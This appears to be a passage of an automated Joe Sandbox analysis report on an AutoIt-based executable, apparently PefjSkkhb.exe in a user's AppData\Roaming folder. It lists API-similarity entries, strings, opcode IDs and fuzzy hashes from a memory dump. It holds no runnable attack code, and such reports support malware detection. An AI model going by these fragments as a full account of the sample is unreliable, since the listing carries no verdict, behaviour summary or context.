                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Window$Long
                                                                                • String ID:
                                                                                • API String ID: 847901565-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                • String ID:
                                                                                • API String ID: 2864067406-0
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: lstrcmpilstrcpylstrlen
                                                                                • String ID: cdecl
                                                                                • API String ID: 4031866154-3896280584
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Heap$InformationProcessToken$AllocCopyErrorFreeLastLength
                                                                                • String ID:
                                                                                • API String ID: 837644225-0
                                                                                Similarity
                                                                                • API ID: CreateMessageObjectSendStockWindow
                                                                                • String ID:
                                                                                • API String ID: 3970641297-0
                                                                                Similarity
                                                                                • API ID: _ctrlfp
                                                                                • String ID:
                                                                                • API String ID: 697997973-0
                                                                                Similarity
                                                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait_invalid_parameter_noinfo
                                                                                • String ID:
                                                                                • API String ID: 2979156933-0
                                                                                Similarity
                                                                                • API ID: ClientRectScreen$InvalidateWindow
                                                                                • String ID:
                                                                                • API String ID: 357397906-0
                                                                                Similarity
                                                                                • API ID: Type$Register$FileLoadModuleNameUser
                                                                                • String ID:
                                                                                • API String ID: 1352324309-0
                                                                                Similarity
                                                                                • API ID: ErrorLast$abort
                                                                                • String ID:
                                                                                • API String ID: 1447195878-0
                                                                                Similarity
                                                                                • API ID: CounterPerformanceQuerySleep
                                                                                • String ID:
                                                                                • API String ID: 2875609808-0
                                                                                Similarity
                                                                                • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                • String ID:
                                                                                • API String ID: 1539411459-0
                                                                                Similarity
                                                                                • API ID: CurrentOpenProcessThreadToken
                                                                                • String ID:
                                                                                • API String ID: 3974789173-0
                                                                                Similarity
                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                • String ID:
                                                                                • API String ID: 2889604237-0
                                                                                Similarity
                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                • String ID:
                                                                                • API String ID: 2889604237-0
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID: gfffffff
                                                                                • API String ID: 3215553584-1523873471
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: ContainedObject
                                                                                • String ID: AutoIt3GUI$Container
                                                                                • API String ID: 3565006973-3941886329
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID: e+000$gfff
                                                                                • API String ID: 3215553584-3030954782
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                • String ID: C:\Users\user\AppData\Roaming\PefjSkkhb.exe
                                                                                • API String ID: 3307058713-2476954778
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Window$CreateDestroyMessageObjectSendStock
                                                                                • String ID: static
                                                                                • API String ID: 3467290483-2160076837
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWidehtonsinet_addr
                                                                                • String ID: 255.255.255.255
                                                                                • API String ID: 2496851823-2422070025
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Window$CreateMessageObjectSendStock
                                                                                • String ID: $SysTabControl32
                                                                                • API String ID: 2080134422-3143400907
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: FileHandleType
                                                                                • String ID: @
                                                                                • API String ID: 3000768030-2766056989
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                • String ID: static
                                                                                • API String ID: 1983116058-2160076837
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$CreateObjectStockWindow
                                                                                • String ID: Combobox
                                                                                • API String ID: 1025951953-2096851135
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: LengthMessageSendTextWindow
                                                                                • String ID: edit
                                                                                • API String ID: 2978978980-2167791130
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: _handle_error
                                                                                • String ID: "$pow
                                                                                • API String ID: 1757819995-713443511
                                                                                • Opcode ID: 2773d63829b6bc9e243f88705d039ab02ec385488ae35a30c1ce332e33ed45c5
                                                                                • Instruction ID: 50f62481bc5d6bd2a659b8ab222f6c26bac48adb13118b76ec1fddede6d46a85
                                                                                • Opcode Fuzzy Hash: 2773d63829b6bc9e243f88705d039ab02ec385488ae35a30c1ce332e33ed45c5
                                                                                • Instruction Fuzzy Hash: 28216172D2CAC587D3B0DF20E440ABAFAA0FBDA344F601325F6890AD55DBBDD155AB10
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: ClassMessageNameSend
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 3678867486-1403004172
                                                                                • Opcode ID: 97deb16edf8e784fc52f0d006fa99df0b5c043f3f1d7c65ec9baf9ca6ee38585
                                                                                • Instruction ID: 1caf710c8111d0f60b9a110e4626483d65482d4e6c9b8b4fd93ad9d2667d1a2d
                                                                                • Opcode Fuzzy Hash: 97deb16edf8e784fc52f0d006fa99df0b5c043f3f1d7c65ec9baf9ca6ee38585
                                                                                • Instruction Fuzzy Hash: CD11F022A186C191FA60FB20D4406E9A3A0FB95BA0F844231DAAC477DADE3CD166CB50
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: ClassMessageNameSend
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 3678867486-1403004172
                                                                                • Opcode ID: d39c91620d6c6e447856c574b1c807ce734865e57223a48666476f59d2f3e294
                                                                                • Instruction ID: c231599a1f524534f2030fe683f502f28c3a3b3e69d0f0cc50f8430b65778bf3
                                                                                • Opcode Fuzzy Hash: d39c91620d6c6e447856c574b1c807ce734865e57223a48666476f59d2f3e294
                                                                                • Instruction Fuzzy Hash: B411E222A086C292FF70F720E450AF9A350FF95794FC44031DA9C47B8ADE2CD225DB10
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: ClassMessageNameSend
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 3678867486-1403004172
                                                                                • Opcode ID: 2b6fed8ad632b1f274e203d646578af3038472905804e24f6343927dca18ccae
                                                                                • Instruction ID: 12647106331fe5295c81efa835f9797b4a746fb8a405dea2ce08008ba47e964f
                                                                                • Opcode Fuzzy Hash: 2b6fed8ad632b1f274e203d646578af3038472905804e24f6343927dca18ccae
                                                                                • Instruction Fuzzy Hash: 62119362A186C192FB70FB20E4516E9A360FF99794FC44431D68C47B59DE2CD615DB20
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: CloseCreateHandleProcess
                                                                                • String ID:
                                                                                • API String ID: 3712363035-3916222277
                                                                                • Opcode ID: 7b42f129ca5b2bc2214f050bb36978d190a1a5278d42b1070c82c133f3bdff27
                                                                                • Instruction ID: 3781622c2e6c2b57cc7567fe4f1350052470994f6f66a45a11ae992ee3f3edd7
                                                                                • Opcode Fuzzy Hash: 7b42f129ca5b2bc2214f050bb36978d190a1a5278d42b1070c82c133f3bdff27
                                                                                • Instruction Fuzzy Hash: 40114F31A1CA858AE720AF22F8005AAB7A5FB847D4F854135DA4987B69CF3CE094CB10
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: ClassMessageNameSend
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 3678867486-1403004172
                                                                                • Opcode ID: 2fa39eb79566fbbf5ef709d97066772d08e715fc924eaba82c6fe28b878daa18
                                                                                • Instruction ID: 4e3fb28ca44aa889ea4e5f1f84c22d126c91d533bbb432560d2b3e6335d6cf40
                                                                                • Opcode Fuzzy Hash: 2fa39eb79566fbbf5ef709d97066772d08e715fc924eaba82c6fe28b878daa18
                                                                                • Instruction Fuzzy Hash: 1201C422A2C5C291FA70F730E490AF99320FF95394FC44131E59D47A9ADE2CD228DB20
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: _ctrlfp_handle_error_raise_exc
                                                                                • String ID: !$tan
                                                                                • API String ID: 3384550415-2428968949
                                                                                • Opcode ID: 2d553fd115d33d3a807ffc94b8434da97490ee8f564b276a29f6e1ed56bbbb66
                                                                                • Instruction ID: e6b9cec1e07bdfc8cca2f555b3ac0a2a39b8b83b651ab15c674b2799e1763853
                                                                                • Opcode Fuzzy Hash: 2d553fd115d33d3a807ffc94b8434da97490ee8f564b276a29f6e1ed56bbbb66
                                                                                • Instruction Fuzzy Hash: A0019631A2CFC541DA64DF22A84077AA252FBDA7D4F504334EA5E0BB98EF7DD1509B00
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: _ctrlfp_handle_error_raise_exc
                                                                                • String ID: !$cos
                                                                                • API String ID: 3384550415-1949035351
                                                                                • Opcode ID: 59a2c881f09cdb696690f699cc12801b637b051dbcc35695dacf0c08331e8fc0
                                                                                • Instruction ID: 81acc0c1d2527d1f11660f5f6e51f2a079caeeab1e165907fc0e7295b48758e3
                                                                                • Opcode Fuzzy Hash: 59a2c881f09cdb696690f699cc12801b637b051dbcc35695dacf0c08331e8fc0
                                                                                • Instruction Fuzzy Hash: 4901B571E28FC941D664DF2298407BAA252BF9A7D4F504334E95A0AB98EF7DD0605B00
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: _ctrlfp_handle_error_raise_exc
                                                                                • String ID: !$sin
                                                                                • API String ID: 3384550415-1565623160
                                                                                • Opcode ID: 9c5650ba25f23863d1585264c289844e213b1bc1e7bffeede2023515f4cd1262
                                                                                • Instruction ID: 54ba6edf4d22d48aadb3ab4a718875ff8d37b410b4eb415e9834adf74870ecc5
                                                                                • Opcode Fuzzy Hash: 9c5650ba25f23863d1585264c289844e213b1bc1e7bffeede2023515f4cd1262
                                                                                • Instruction Fuzzy Hash: EE01B571E28FC541D664DF2298407BAA262BF9A7D4F504334E95A0AB98EF6DD0505B00
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: _handle_error
                                                                                • String ID: "$exp
                                                                                • API String ID: 1757819995-2878093337
                                                                                • Opcode ID: 1dd5b4e450707440dd9d18b5c78d2e187119c4904f0596c8cb375bf303972248
                                                                                • Instruction ID: ff26e4e7c950bdec5d044c4bc168f48be9ac61c20fd7068eb02394e90d0306c0
                                                                                • Opcode Fuzzy Hash: 1dd5b4e450707440dd9d18b5c78d2e187119c4904f0596c8cb375bf303972248
                                                                                • Instruction Fuzzy Hash: 2A01A536A39E8882E230DF34D0456EAB7B0FFEA344F601315E7441AA64DB7DD4919B00
                                                                                APIs
                                                                                • try_get_function.LIBVCRUNTIME ref: 00007FF79F8975E9
                                                                                • TlsSetValue.KERNEL32(?,?,?,00007FF79F897241,?,?,?,?,00007FF79F89660C,?,?,?,?,00007FF79F894CD3), ref: 00007FF79F897600
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Valuetry_get_function
                                                                                • String ID: FlsSetValue
                                                                                • API String ID: 738293619-3750699315
                                                                                • Opcode ID: 5ef202829eb63c082d646b2b3c40b210c8e2726f911b0f602dea3cecf0443926
                                                                                • Instruction ID: 3fab92fde9e56334a7f8dc1f99dd6d688821e2c9268c30156a6933f54e30cff0
                                                                                • Opcode Fuzzy Hash: 5ef202829eb63c082d646b2b3c40b210c8e2726f911b0f602dea3cecf0443926
                                                                                • Instruction Fuzzy Hash: 59E06562A0C5C291EB666B75E8404F8A361AF48BA1FC94035D92E4A259CE3CE498D620
                                                                                APIs
                                                                                • std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF79F895629
                                                                                • _CxxThrowException.LIBVCRUNTIME ref: 00007FF79F89563A
                                                                                  • Part of subcall function 00007FF79F897018: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF79F89563F), ref: 00007FF79F89708D
                                                                                  • Part of subcall function 00007FF79F897018: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF79F89563F), ref: 00007FF79F8970BF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Exception$FileHeaderRaiseThrowstd::bad_alloc::bad_alloc
                                                                                • String ID: Unknown exception
                                                                                • API String ID: 3561508498-410509341
                                                                                • Opcode ID: 9460797eaada1e9b880d8cc7196a2a9f4627ae69dcab396aeadb3e3bc5cc4094
                                                                                • Instruction ID: f1fae93e448e85b0539a1d2e25699db744139a12d3e97748956c0f7e9ad4fc08
                                                                                • Opcode Fuzzy Hash: 9460797eaada1e9b880d8cc7196a2a9f4627ae69dcab396aeadb3e3bc5cc4094
                                                                                • Instruction Fuzzy Hash: FFD01226A149C5D1DE20FB14D8557D8E330F740308FD04431D14C815B5DF2CD64AE310